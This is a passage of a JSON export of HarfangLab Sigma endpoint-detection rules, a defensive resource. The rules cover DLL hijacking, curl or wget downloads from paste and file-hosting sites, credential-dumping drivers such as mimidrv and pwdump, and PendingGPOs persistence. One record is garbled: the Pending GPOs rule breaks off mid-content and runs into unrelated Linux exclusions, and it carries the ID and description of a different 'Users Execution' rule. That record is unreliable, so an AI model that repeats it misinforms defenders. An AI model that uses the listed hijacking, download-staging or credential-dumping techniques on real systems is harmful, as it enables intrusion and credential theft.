"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592265Z",
"creation_date": "2026-03-23T11:45:34.592268Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592275Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wscript.yml",
"content": "title: DLL Hijacking via wscript.exe\nid: 33eb8e8a-ac3d-4882-a33c-a06936e7ac1c\ndescription: |\n Detects potential Windows DLL Hijacking via wscript.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wscript.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "33eb8e8a-ac3d-4882-a33c-a06936e7ac1c",
"rule_name": "DLL Hijacking via wscript.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wscript.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable to a directory they control and planting the malicious DLL in the same folder.\nThe rule only fires when both wscript.exe and the loaded version.dll are located outside the Windows system directories (System32, SysWOW64, WinSxS) and the library is not signed by Microsoft Windows.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "33f20b55-a6a9-47fa-8058-df707fd25325",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095386Z",
"creation_date": "2026-03-23T11:45:34.095388Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095392Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1105_curl_suspicious_link_macos.yml",
"content": "title: File Downloaded via cURL or wget from Suspicious URL (macOS)\nid: 33f20b55-a6a9-47fa-8058-df707fd25325\ndescription: |\n Detects the usage of cURL or wget to download a file from public hosting services that may contain a malicious payload.\n This technique is used by attackers to download payloads that are hosted on public websites.\n It is recommended to perform an analysis of the downloaded file to check if the content is malicious.\nreferences:\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/02/13\nmodified: 2025/09/10\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.t1071.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Wget\n - classification.macOS.LOLBin.Curl\n - classification.macOS.Behavior.FileDownload\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|endswith:\n - '/wget'\n - '/curl'\n CommandLine|contains:\n - 'cdn.discordapp.com'\n - 'api.telegram.org'\n - 'www.dropbox.com'\n - 'api.dropboxapi.com'\n - 'content.dropboxapi.com'\n - 'transfer.sh'\n - 'anonfiles.com'\n - 'file.io'\n - 'gofile.io'\n - 'raw.githubusercontent.com'\n - 'gist.githubusercontent.com'\n - 'pastebin.com'\n - 'mediafire.com'\n - 'mega.nz'\n - 'ddns.net'\n - '.paste.ee'\n - '.hastebin.com'\n - '.ghostbin.co/'\n - 'ufile.io'\n - 'storage.googleapis.com'\n - 'send.exploit.in'\n - 'privatlab.net'\n - 'privatlab.com'\n - 'sendspace.com'\n - 'pastetext.net'\n - 'pastebin.pl'\n - 'paste.ee'\n - 'pastie.org'\n - 'archive.org'\n - 'paste.c-net.org'\n\n exclusion_timesketch:\n CommandLine|contains: ' https://raw.githubusercontent.com/google/'\n\n exclusion_homebrew:\n CommandLine|contains: ' https://raw.githubusercontent.com/Homebrew/'\n\n exclusion_ohmyzsh:\n CommandLine|contains: ' https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh'\n\n exclusion_ruby_brew_update:\n 
ParentCommandLine|startswith: '/opt/homebrew/library/homebrew/vendor/portable-ruby/current/bin/ruby -w1 --disable=gems,rubyopt /opt/homebrew/library/homebrew/brew.rb upgrade'\n\n exclusion_nvm:\n CommandLine: 'curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v*/install.sh'\n\n exclusion_nix:\n CommandLine|contains: ' https://raw.githubusercontent.com/nixos/experimental-nix-installer/'\n\n exclusion_vscode:\n CommandLine|contains:\n - ' https://raw.githubusercontent.com/microsoft/vscode/master/extensions/json-language-features/package.json'\n - ' https://raw.githubusercontent.com/microsoft/pyright/*/packages/vscode-pyright/package.json'\n - ' https://raw.githubusercontent.com/microsoft/vscode/main/extensions/typescript-language-features/package.json'\n - ' https://raw.githubusercontent.com/rust-analyzer/rust-analyzer/*/editors/code/package.json'\n - ' https://raw.githubusercontent.com/luals/vscode-lua/master/package.json'\n\n exclusion_apache:\n CommandLine|contains: ' https://raw.githubusercontent.com/apache/'\n\n exclusion_installomator:\n CommandLine: 'curl -o installomator.sh https://raw.githubusercontent.com/installomator/installomator/main/installomator.sh'\n\n exclusion_minikube:\n CommandLine|contains: 'curl -LO https://storage.googleapis.com/minikube/releases/latest/'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "33f20b55-a6a9-47fa-8058-df707fd25325",
"rule_name": "File Downloaded via cURL or wget from Suspicious URL (macOS)",
"rule_description": "Detects the use of cURL or wget to download a file from public file-hosting, paste or CDN services that are commonly used to stage malicious payloads.\nThis technique is used by attackers to retrieve payloads hosted on public websites.\nNote that the exclusions are command-line substring matches: a command that also references an allow-listed URL (for example a raw.githubusercontent.com path under the google, Homebrew or apache organisations) will not alert, so the absence of an alert does not clear a download.\nIt is recommended to analyze the downloaded file to determine whether its content is malicious.\n",
"rule_creation_date": "2023-02-13",
"rule_modified_date": "2025-09-10",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "340aa5a9-5616-4c66-a76c-91098df5a7b3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086442Z",
"creation_date": "2026-03-23T11:45:34.086444Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086449Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"http://foofus.net/goons/fizzgig/fgdump/",
"https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PWDumpX.htm",
"https://github.com/gentilkiwi/mimikatz",
"https://jpcertcc.github.io/ToolAnalysisResultSheet/details/gsecdump.htm",
"http://foofus.net/goons/fizzgig/pwdump/",
"https://attack.mitre.org/software/S0119/",
"https://attack.mitre.org/techniques/T1068/",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1003_malicious_driver_for_credential_dumping.yml",
"content": "title: Malicious Driver Linked to Credential Dumping Loaded\nid: 340aa5a9-5616-4c66-a76c-91098df5a7b3\ndescription: |\n Detects the loading of malicious Windows kernel drivers that have the ability to perform credential dumping.\n Attackers may try to dump secrets or credentials from the system directly from the kernel to use for later lateral movement or persistence.\n These drivers are either signed (usually maliciously) or unsigned, if integrity checks were disabled earlier in the injection chain.\n It is recommended to analyze the context around the loading of the malicious driver to look for other malicious actions on the host.\nreferences:\n - http://foofus.net/goons/fizzgig/fgdump/\n - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PWDumpX.htm\n - https://github.com/gentilkiwi/mimikatz\n - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/gsecdump.htm\n - http://foofus.net/goons/fizzgig/pwdump/\n - https://attack.mitre.org/software/S0119/\n - https://attack.mitre.org/techniques/T1068/\n - https://attack.mitre.org/techniques/T1003/\ndate: 2022/08/02\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - attack.credential_access\n - attack.t1003\n - classification.Windows.Source.DriverLoad\n - classification.Windows.Rootkit.CredentialDumper\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: driver_load\ndetection:\n selection:\n ImageLoaded|contains:\n - 'fgexec'\n - 'dumpsvc'\n - 'cachedump'\n - 'mimidrv'\n - 'gsecdump'\n - 'servpw'\n - 'pwdump'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "340aa5a9-5616-4c66-a76c-91098df5a7b3",
"rule_name": "Malicious Driver Linked to Credential Dumping Loaded",
"rule_description": "Detects the loading of known malicious Windows kernel drivers that have the ability to perform credential dumping.\nAttackers may try to dump secrets or credentials from the system directly from the kernel for later lateral movement or persistence.\nThese drivers are either signed (usually maliciously) or unsigned, if integrity checks were disabled earlier in the infection chain.\nThe rule matches on well-known driver file names (e.g. mimidrv, pwdump, gsecdump), so a renamed driver will not be detected; correlate with the execution of the associated credential dumping tool.\nIt is recommended to analyze the context around the loading of the malicious driver to look for other malicious actions on the host.\n",
"rule_creation_date": "2022-08-02",
"rule_modified_date": "2025-01-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "34295504-9358-4119-aa08-84b4c5880ad5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097205Z",
"creation_date": "2026-03-23T11:45:34.097207Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097211Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html",
"https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-i/107742/",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_k7sysmon.yml",
"content": "title: DLL Hijacking via K7SysMon.exe\nid: 34295504-9358-4119-aa08-84b4c5880ad5\ndescription: |\n Detects potential Windows DLL Hijacking via K7SysMon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\n - https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-i/107742/\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/09/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'K7SysMon.EXE'\n ImageLoaded|endswith: '\\K7SysMn1.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\K7 Computing\\'\n - '?:\\Program Files (x86)\\K7 Computing\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\K7 Computing\\'\n - '?:\\Program Files (x86)\\K7 Computing\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'K7 Computing Pvt Ltd'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "34295504-9358-4119-aa08-84b4c5880ad5",
"rule_name": "DLL Hijacking via K7SysMon.exe",
"rule_description": "Detects potential Windows DLL Hijacking via K7SysMon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3437577c-61e0-46ac-9f02-bbc91228e25f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072669Z",
"creation_date": "2026-03-23T11:45:34.072671Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072675Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1484/001/",
"https://securelist.com/gootkit-the-cautious-trojan/102731/"
],
"name": "t1484_001_persistence_registry_pendinggpos.yml",
"content": "title: Pending GPOs Added\nid: 3437577c-61e0-46ac-9f02-bbc91228e25f\ndescription: |\n Detects when an entry in pending GPOs is added to the registry. This has been used by malwares such as GootKit.\n To achieve persistence, the malware generates an INF file containing a [DefaultInstall] section that references the payload.\n It then modifies the PendingGPOs registry key, inserting the absolute path of the INF file.\n When explorer.exe processes Group Policy Objects (GPOs), it executes the payload specified in the [DefaultInstall] section of the INF file.\n It is recommended to ensure that this modification is legitimate and performed by an authorized administrator. You need to review the [DefaultInstall] section of the INF file to check if it includes an absolute path to malware.\nreferences:\n - https://attack.mitre.org/techniques/T1484/001/\n - https://securelist.com/gootkit-the-cautious-trojan/102731/\ndate: 2020/09/24\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1484.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n # PendingGPOs trick used by gootkit for instance\n # contains X values :\n # Count (set to 1)\n # SectionX (Section1/Section2/...) : DefaultInstall for instance (in .ini file)\n # PathX (Path1/Path2/...) 
: path to ini file\n\n # only alert on PathX being set (others are meaningless)\n TargetObject|contains: '\\SOFTWARE\\Microsoft\\IEAK\\GroupPolicy\\PendingGPOs\\Path'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_ie_custom_settings:\n # commandline : rundll32 iedkcs32.dll,BrandExternal ;*2,3 /proc/end <==?;echo ?##Moba##?; done'\n\n exclusion_nagios:\n ParentCommandLine|startswith: 'bash -c /usr/local/nagios/libexec/check_'\n\n exclusion_fog:\n ParentCommandLine|contains : '/opt/fog-service/FOGUserService.exe'\n\n exclusion_orbit:\n ParentImage: '/opt/orbit/bin/orbit/linux*/orbit'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "361b764f-8b11-4ec2-b6dd-2d8fb7195f6f",
"rule_name": "Users Execution",
"rule_description": "Detects the execution of the 'users' command to print the list of users currently logged into the system.\nAttackers may use this technique during the discovery phase to retrieve the list of existing users or to list users that are currently logged in.\nIt is recommended to correlate this alert with any other discovery activity on the host.\nIf this is a recurring false positive, it is highly recommended to create a whitelist for the offending software.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2026-02-25",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1087.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "36295180-e9b0-4900-8268-36a38e641137",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082341Z",
"creation_date": "2026-03-23T11:45:34.082343Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082347Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_write.yml",
"content": "title: DLL Hijacking via write.exe\nid: 36295180-e9b0-4900-8268-36a38e641137\ndescription: |\n Detects potential Windows DLL Hijacking via write.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'write'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CLDAPI.dll'\n - '\\CRYPTBASE.DLL'\n - '\\davclnt.dll'\n - '\\drprov.dll'\n - '\\edputil.dll'\n - '\\FLTLIB.DLL'\n - '\\ntlanman.dll'\n - '\\p9np.dll'\n - '\\PROPSYS.dll'\n - '\\windows.storage.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "36295180-e9b0-4900-8268-36a38e641137",
"rule_name": "DLL Hijacking via write.exe",
"rule_description": "Detects potential Windows DLL Hijacking via write.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3652ecec-d855-48ad-8fb0-ebcbcd0522e7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602505Z",
"creation_date": "2026-03-23T11:45:34.602508Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602515Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wbengine.yml",
"content": "title: DLL Hijacking via wbengine.exe\nid: 3652ecec-d855-48ad-8fb0-ebcbcd0522e7\ndescription: |\n Detects potential Windows DLL Hijacking via wbengine.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wbengine.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\CLUSAPI.dll'\n - '\\DNSAPI.dll'\n - '\\FLTLIB.DLL'\n - '\\NETUTILS.DLL'\n - '\\SPP.dll'\n - '\\SRVCLI.DLL'\n - '\\VirtDisk.dll'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n - '\\wer.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3652ecec-d855-48ad-8fb0-ebcbcd0522e7",
"rule_name": "DLL Hijacking via wbengine.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wbengine.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3681933f-d809-4ed2-ab94-c97f202a5989",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
